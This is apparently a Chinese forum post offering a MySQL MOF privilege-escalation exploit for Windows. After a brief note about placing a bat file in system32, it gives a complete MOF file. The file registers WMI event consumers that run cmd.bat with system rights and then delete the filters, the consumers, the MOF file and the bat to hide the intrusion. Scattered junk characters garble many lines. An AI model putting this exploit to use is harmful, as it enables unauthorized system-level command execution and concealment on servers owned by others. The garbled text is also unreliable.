Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
3 g( e$ A3 H% E; p$ N. D6 ~7 f% C: T
/ E: M, Z( h8 O6 m这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

. D5 l- o' x: x. I#pragma
$ n  ^. F) M. D0 d                        namespace("\\\\.\\root\\cimv2")
                        class
                        MyClass547
0 e0 B- S- [9 ]3 S4 e                        {           [key]
                        string
                        Name;
                        };
- Q/ C& _6 c& H                        class
                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
( \4 U! L6 i' ?1 y; z                        string
                        Name;           [not_null]
6 {- J) k+ z" `- x& r                        string
4 ]" x* J6 |% x" I3 Q                        ScriptingEngine;           string
                        ScriptFileName;           [template]
* G* |  _' i' Z6 r7 j/ C$ V( D                        string
                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
                        =
5 p; v% i/ u7 f) G7 ~. N% d                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
# `7 u( q- O) |                        PerUserInitialization
                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
                        =
                        {"ActiveScriptEventConsumer"};
1 f4 j, a1 V% u                        };
; R, X; v6 }1 N2 H                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
% J8 w& r! _, [, _                        =
                        "ASEC";         ScriptingEngine
6 f- J3 G' q9 ~2 W4 i: \9 V, [, s, p                        =
                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
# c8 ^; L. W/ Q$ f9 t+ i                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
- \2 ?+ q& K, m                        =
, s6 x4 z! i( z, ~                        "qndASEC";         ScriptingEngine
                        =
- z1 q. M6 q  h( W5 }4 e( X2 I) H                        "JScript";         ScriptText
                        =
5 q5 x' k- O! B. j3 |. X                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
; F/ W7 N. ^& |- p5 B- ]6 C0 o" i; w' h# C                        }; instance of __EventFilter as $Filt {         Name
                        =
1 q5 s( |& O% D" Y% P! m                        "instfilt";         Query
                        =
! F1 a- O5 ]' I% j                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
. {" z, `% q2 D9 Y( l, z) N; P                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
                        =
. `. J( S# ^- s( I                        "qndfilt";         Query
; Y  B. _2 o/ I7 J                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
* V* x' s7 p8 c                        = $cons;         Filter
                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
( \" [/ ~$ `* [' {% z6 u  K                        = $cons2;         Filter
                        = $Filt2;
0 Z/ g' B! c' O4 B3 F                        }; instance of MyClass547
                        as $MyClass {         Name
                        =
                        "ClassConsumer";
                        };